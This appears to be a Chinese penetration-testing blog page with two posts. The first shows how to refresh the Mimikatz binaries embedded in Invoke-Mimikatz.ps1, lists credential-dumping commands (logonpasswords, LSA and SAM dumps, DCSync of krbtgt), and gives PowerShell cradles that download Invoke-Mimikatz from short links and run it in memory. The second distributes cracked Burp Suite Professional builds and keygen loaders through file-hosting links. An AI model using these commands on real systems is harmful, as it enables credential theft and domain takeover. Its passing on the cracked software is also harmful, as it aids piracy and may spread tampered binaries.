Updating the Mimikatz build embedded in Invoke-Mimikatz.ps1 to the latest 2.2.0 20200519 release  (Technical articles)

[image: shotpic_2020-06-24_12-26-38.png]



What is Invoke-Mimikatz? It is the PowerShell wrapper for Mimikatz that ships in the PowerSploit penetration-testing toolkit: it carries the mimikatz.exe binaries as base64 strings and reflectively loads one of them into memory to dump credentials from Windows, so nothing is written to disk.

The problem is that the Mimikatz build it embeds is years old, which causes assorted failures in practice, because Mimikatz has to locate per-build LSASS structures and an old build does not know the newer Windows releases.



Reading the script at https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 shows that the $PEBytes64 and $PEBytes32 variables are simply the x64 and Win32 mimikatz.exe files, base64-encoded; the script picks one according to the pointer size of the host PowerShell process and loads it reflectively.

So the fix is to swap in the two newest binaries. The following Python 3 script, update.py, does the replacement:

import fileinput
import base64

# Read both freshly built mimikatz binaries from the extracted mimikatz_trunk
# layout and base64-encode them the way the script stores them.
with open("./Win32/mimikatz.exe", "rb") as f:
    win32 = base64.b64encode(f.read()).decode()

with open("./x64/mimikatz.exe", "rb") as f:
    x64 = base64.b64encode(f.read()).decode()

# inplace=1 redirects print() into the file, so every original line is either
# rewritten (the two blob assignments) or echoed back unchanged.
for line in fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1):
    line = line.rstrip('\r\n')
    if "$PEBytes64 = " in line:
        print("$PEBytes64 = '" + x64 + "'")
    elif "$PEBytes32 = " in line:
        print("$PEBytes32 = '" + win32 + "'")
    else:
        print(line)

Put update.py and Invoke-Mimikatz.ps1 in the directory where mimikatz_trunk.zip was extracted, so that ./Win32/mimikatz.exe and ./x64/mimikatz.exe sit next to them, and run it; that is the whole update.

The result is shown in the screenshot at the top: the embedded build goes from the 2016 Mimikatz 2.1 to the latest 2.2.0 20200519 build (Windows 10 2004, build 19041).
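The plain search-and-replace above works, but it will happily embed a 32-bit binary under $PEBytes64, drop the script's indentation, or leave a half-patched file behind if something goes wrong. As an added example (not code from the original post or from PowerSploit), here is a stricter version of the same replacement: it reads the COFF Machine field of each mimikatz.exe to confirm its bitness, keeps the indentation of the assignment line, refuses to write unless it found exactly one assignment per variable, and writes through a temporary file. The SAMPLE_SCRIPT text and the fake_pe() stub are constructed stand-ins so the example runs offline; the paths used in update_file() are the ones the post uses.

```python
import base64
import re
import struct
from pathlib import Path

# COFF "Machine" values of the two builds the script embeds.
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664

# One assignment line each, e.g. "\t$PEBytes64 = 'TVqQAAMA...'", as in the PowerSploit
# script. Assumes the blob is a single single-quoted string on one line.
ASSIGN_RE = re.compile(
    r"^(?P<indent>\s*)\$(?P<name>PEBytes64|PEBytes32)\s*=\s*'(?P<b64>[^']*)'\s*$"
)


def pe_machine(data: bytes) -> int:
    """Return the COFF Machine field of a PE image, or raise ValueError if it is not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]


def patch_script(text: str, pe32: bytes, pe64: bytes) -> str:
    """Return the script with both blobs replaced, after checking each binary's bitness."""
    expected = {"PEBytes32": IMAGE_FILE_MACHINE_I386, "PEBytes64": IMAGE_FILE_MACHINE_AMD64}
    blobs = {"PEBytes32": pe32, "PEBytes64": pe64}
    for name, data in blobs.items():
        machine = pe_machine(data)
        if machine != expected[name]:
            raise ValueError(f"{name}: wrong architecture (Machine=0x{machine:04x})")
    seen = {name: 0 for name in blobs}
    out = []
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m is None:
            out.append(line)
            continue
        name = m.group("name")
        seen[name] += 1
        b64 = base64.b64encode(blobs[name]).decode("ascii")
        out.append(f"{m.group('indent')}${name} = '{b64}'")   # keep the script's indentation
    for name, count in seen.items():
        if count != 1:                                       # never emit a half-patched script
            raise ValueError(f"expected exactly one {name} assignment, found {count}")
    return "\n".join(out) + "\n"


def embedded_pe(text: str, name: str) -> bytes:
    """Decode the binary currently stored under $name (to check what a script really carries)."""
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m and m.group("name") == name:
            return base64.b64decode(m.group("b64"))
    raise ValueError(f"no {name} assignment in script")


def update_file(script: Path, win32_exe: Path, x64_exe: Path) -> None:
    """On-disk equivalent of update.py: write a temp file and rename it, so a failure leaves the original intact."""
    new_text = patch_script(
        script.read_text(encoding="utf-8", errors="surrogateescape"),
        win32_exe.read_bytes(), x64_exe.read_bytes(),
    )
    tmp = script.with_name(script.name + ".tmp")
    with open(tmp, "w", encoding="utf-8", errors="surrogateescape", newline="\n") as fh:
        fh.write(new_text)
    tmp.replace(script)


def fake_pe(machine: int) -> bytes:
    """Constructed stub with only the MZ/PE headers pe_machine reads; not a runnable executable."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)      # e_lfanew: PE header right after the DOS header
    return bytes(hdr) + b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18


# Constructed stand-in for the relevant lines of Invoke-Mimikatz.ps1 (tab-indented like the real one).
SAMPLE_SCRIPT = (
    "\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n"
    "\t$PEBytes64 = 'AAAA'\n"
    "\t$PEBytes32 = 'BBBB'\n"
    "\tif ([IntPtr]::Size -eq 8) { $PEBytes = $PEBytes64 } else { $PEBytes = $PEBytes32 }\n"
)

if __name__ == "__main__":
    print(patch_script(SAMPLE_SCRIPT, fake_pe(IMAGE_FILE_MACHINE_I386), fake_pe(IMAGE_FILE_MACHINE_AMD64)))
    # Real run, from the extracted mimikatz_trunk directory:
    # update_file(Path("Invoke-Mimikatz.ps1"), Path("Win32/mimikatz.exe"), Path("x64/mimikatz.exe"))
```

The embedded_pe() helper is also the quickest way to check what build a copy of the script found in the wild actually carries: decode the blob, write it out, and look at its version resource or run it in a VM.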

A quick note on privileges: Mimikatz needs a high-privilege context. You need at least local administrator, and the credential-dumping commands additionally need SeDebugPrivilege to open LSASS (SYSTEM has it by default; dumping the SAM or LSA secrets needs SYSTEM itself, via token::elevate), so escalate first if necessary.

Basic usage:

privilege::debug  // enables SeDebugPrivilege on the current token so LSASS can be opened; needed from an administrator shell, can be skipped when already running as SYSTEM. It does not change which account you run as: token::elevate is what impersonates SYSTEM.

Dumping hashes:

sekurlsa::logonpasswords   // credentials of the currently logged-on sessions: NTLM hashes from the msv provider and, where the provider still caches them, plaintext passwords (needs SeDebugPrivilege)

lsadump::lsa /patch   // NTLM hashes of the accounts held by LSA on this machine (local SAM accounts; on a domain controller, every domain account), obtained by patching LSASS



Other Mimikatz commands:

lsadump::sam /system:SYSTEM.hiv /sam:SAM.hiv   // dump every local account's hash from saved registry hives; take the SYSTEM and SAM hives from a Volume Shadow Copy first. Both are required: the SAM cannot be decrypted without the boot key stored in SYSTEM

Getting credentials from a memory dump of LSASS instead of the live process:

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

Pull the password data of the KRBTGT account in the rd.adsecurity.org domain (DCSync: the account is replicated through the directory replication protocol, so nothing runs on the DC; it requires replication rights, which Domain Admins hold by default):

lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt

Pull the password data of the computer account of the ADSDC03 domain controller in the lab.adsecurity.org domain:

lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$



Using Mimikatz from msf:

In a meterpreter session, load the mimikatz extension (this is the legacy extension; current Metasploit ships the kiwi extension, loaded with load kiwi, which tracks newer Mimikatz releases):

load mimikatz

Then run help to list its commands:

kerberos          Attempt to retrieve kerberos creds

livessp           Attempt to retrieve livessp creds

mimikatz_command  Run a custom command

msv               Attempt to retrieve msv creds (hashes)

ssp               Attempt to retrieve ssp creds

tspkg             Attempt to retrieve tspkg creds

wdigest           Attempt to retrieve wdigest creds

The ones used most are kerberos and msv (msv is where the NTLM hashes come from).



Running Mimikatz without dropping a file

On Windows Server 2008 and earlier, use:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/SdU3mjdm'); Invoke-Mimikatz -DumpCreds"

On Windows Server releases newer than 2008, use:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/wv7uNQrc'); Invoke-Mimikatz"

Then dump as above to obtain the NTLM hashes. Keep in mind that this cradle downloads and executes whatever the short link currently points at; host the script yourself, or at least compare its hash with the repository copy, before running it on an engagement.

Note that the new script used above comes from my GitHub repository: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/Invoke-Mimikatz.ps1

Please give it a star! It collects the penetration-testing tools, POCs, and articles on Android pentesting and unpacking that I have found worthwhile.

There is currently a bug; the observant will spot it in the second command window of the screenshot. Pull requests from anyone who can fix it are welcome!



Reference: article on the 鸿鹄实验室 WeChat public account, "渗透tips ---> 更新你的invoke-mimikatz" (pentest tips: update your invoke-mimikatz)


Posted by admin on 2020-6-24 12:27

Burp Suite Professional Edition v2020.5 x64 & Burp_Suite_Pro_v2020.5_Loader_Keygen download --- updated to burpsuite_pro_v2020.11.3.jar  (Security tools)

Screenshot first:
[image: burpsuite_pro_v2020.9.2.png]
Burp Suite Professional Edition v2020.5 x64 & Burp_Suite_Pro_v2020.5_Loader_Keygen download. Official release notes:

You can now choose to display non-printing characters as "lozenges" in the HTTP message editor. This is supported for any bytes with a hexadecimal value lower than 20, which includes tabs, line feeds, carriage returns, and null bytes.

This feature will be greatly beneficial for many use cases, including:

Spotting subtle differences between byte values in responses

Experimenting with HTTP request smuggling vulnerabilities

Studying line endings to identify potential HTTP header injection vulnerabilities

Observing how null-byte injections are handled by the server

Non-printing characters are hidden by default, but you can toggle the lozenges on and off by clicking the "\n" button at the bottom of the editor.

These non-printing characters can currently only be displayed in the message editor. For now, you have to edit bytes using Burp's hex view. However, we plan to enable you to do this directly in the message editor in the near future.

Bug fixes:

We have also implemented several minor bug fixes, most notably:

The response received/completed times are now displayed for 401 responses.

The response time is now displayed even when the time taken was < 1ms.

"Check session is valid" session handling rules are now applied properly when session tracing is running.

The content discovery tool no longer erroneously displays the "Session is not running" message.

This release also provides the following minor improvements to various areas of Burp:

The embedded Chromium browser for the experimental browser-driven scanning mode has been upgraded to version 83.

Java 14 is now supported for both Professional and Community Edition.

Burp Proxy no longer intercepts requests for SVG or font files by default.

Crawling of static content is now faster.

Download links:

---------------------------------------------------------------------

2020/12/02 update: burpsuite_pro_v2020.11.3.jar

https://cloud.189.cn/t/JbqUJ3QrEfqa (access code: 5sri)

Barring surprises I will not be sharing further builds; Burp can now be downloaded publicly from the official site.

---------------------------------------------------------------------

2020/11/28 update: burpsuite_pro_v2020.11.2.jar

https://cloud.189.cn/t/eM3yUrJniiIv (access code: 30ta)

---------------------------------------------------------------------

2020/11/20 update: burpsuite_pro_v2020.11.1.jar

https://cloud.189.cn/t/ieYRBzjUBzUb (access code: waq8)

https://mega.nz/folder/aU8QBCIC#1vu1C1zXFFUZonO-uCLLlg

---------------------------------------------------------------------

2020/11/10 update: burpsuite_pro_v2020.11.jar download:

Link: https://cloud.189.cn/t/MvInAb6vQRZr (access code: b8ul)

$ shasum -a 256 burpsuite_pro_v2020.11.jar&&md5 burpsuite_pro_v2020.11.jar

8ea15e1a0a5b742744afb7e1ab25759081e468eee6a853d7a8546ec3b5c6096c burpsuite_pro_v2020.11.jar

MD5 (burpsuite_pro_v2020.11.jar) = 9d0dea6acc6b8570fd9c9c32eb981474


---------------------------------------------------------------------

2020/10/20 update: burpsuite_pro_v2020.9.2.jar download:
Link: https://cloud.189.cn/t/RneiMvraeiIr (access code: q1es)
https://mega.nz/folder/yRkGHBwQ#r5a8fxZSEJ_HGnxZ7eZ39Q

---------------------------------------------------------------------

2020/09/05 update: burpsuite_pro_v2020.9.1.jar download:

https://cloud.189.cn/t/BVnyUvEVbiUb (access code: lpy8)

https://mega.nz/folder/bNkgzYIC#qK7ET0ddW9wYjrWT8pke1Q

$ shasum -a 256 burpsuite_pro_v2020.9.1.jar

ad79a1a7c3ab7a7714608ff7bb88a29d2b490a3e4b02ede2a61da6d3213dd08b burpsuite_pro_v2020.9.1.jar

$ md5 burpsuite_pro_v2020.9.1.jar

MD5 (burpsuite_pro_v2020.9.1.jar) = bfd49439d8aeace81a704e82b43dca74

---------------------------------------------------------------------
2020/09/04 update: burpsuite_pro_v2020.9.jar download:

https://cloud.189.cn/t/e2MniiUfMRje (access code: wkw8)

https://mega.nz/folder/XA1HQbpI#x9oKlzY_n4_gVWg6BuE8PQ

$ shasum -a 256 burpsuite_pro_v2020.9.jar

8175e78a42f2959a05830cbf7f082f50edec2ad3dcc58d8609980063a1c91686 burpsuite_pro_v2020.9.jar

$ md5 burpsuite_pro_v2020.9.jar

MD5 (burpsuite_pro_v2020.9.jar) = bccee79151a2648d33e29da081703c9c

---------------------------------------------------------------------

2020/08/22 update: burpsuite_pro_v2020.8.1.jar & burpsuite_pro_linux_v2020_8_1.sh download:

https://cloud.189.cn/t/uq6Bveyu6Vfy (access code: e3te)

https://mega.nz/folder/LAthQZxQ#24CefPgmwT3j9n8EpsYLtw

Checksums (screenshots):
[image: jar_burp_8.1_hash.png]
[image: linux_burp_8.1_hash.png]

---------------------------------------------------------------------

2020/08/07 update: burpsuite_prov2020.8.jar download:

https://cloud.189.cn/t/JrUFNj3yYriu (access code: 6f4r)

https://mega.nz/folder/rZ1RkIzK#G2iwuZgxi1uyrSLI-upyg
---------------------------------------------------------------------
2020/07/18 update: burpsuite_pro_v2020.7.jar download:

https://cloud.189.cn/t/INvu6fyIFvEb (access code: ox2w)

https://mega.nz/folder/eY1nEQAD#4uuJzQkl8gHRpggLbzUi0Q
---------------------------------------------------------------------

2020/07/05 update: burpsuite_pro_v2020.6.jar download:

https://cloud.189.cn/t/6vy6NnbY7FNv (access code: 2cua)

https://mega.nz/file/TFEmhIpY#wvBqsNVkFMs0zMz6yec8GHNoMKAVLkl-JnVIG4gNDLg

---------------------------------------------------------------------

2020/06/21 update: burpsuite_pro_v2020.5.1.jar download:

https://cloud.189.cn/t/YFjIbmu6BzQb (access code: xp6t)

https://mega.nz/folder/SFNyXI5L#bTSK9CEQ9u6dl-tR03jOJg

burpsuite_pro_v2020.5.1_noJDK.7z download:

https://cloud.189.cn/t/EB7VRfmIv2Y3 (access code: toq7)

---------------------------------------------------------------------

Stand-alone burpsuite_pro_v2020.5.jar download:
https://cloud.189.cn/t/eEB3a2FN3e2m (access code: b678)
https://mega.nz/file/SQ82RYzS#DsWfmm1i6pjr_Ob6gpfwyigdPUJauM2pCHQwfbzOZvs
Stand-alone activation package (keygen loader, without JDK) download:
https://cloud.189.cn/t/ai2yeuE3qiua (access code: q9t8)
https://mega.nz/file/vMkEgYRZ#S-35eQEJuxcRxhl3P0o7Jg4-ASHQyT0pAP73AYObrcc

jdk-11.0.7.7z download:
https://cloud.189.cn/t/Mb6n6fbiAfAv

https://www89.zippyshare.com/v/t3ulVWpo/file.html
https://mega.nz/file/vMNBUQhD#Q8A6gAhak4hX8eD2hc6_Jg_TgCmXcYs4M8aCmZFQlhE
Full bundle download:
Not uploading it again: download the stand-alone JDK and the stand-alone activation package (keygen loader, no JDK) above, extract them into the same directory, and it is ready to use.
See here for the directory layout:

If you have used a cracked build before, there is no need to activate again; just create a desktop shortcut. For details see the previous post on activating and downloading Burp 2020.4.1: https://mrxn.net/hacktools/663.html
Apologies for anything I have missed.
If you can, please support the official licensed version.
As always, the resources come from the internet; I only bundled them to suit my own workflow.


Posted by admin on 2020-6-7 15:27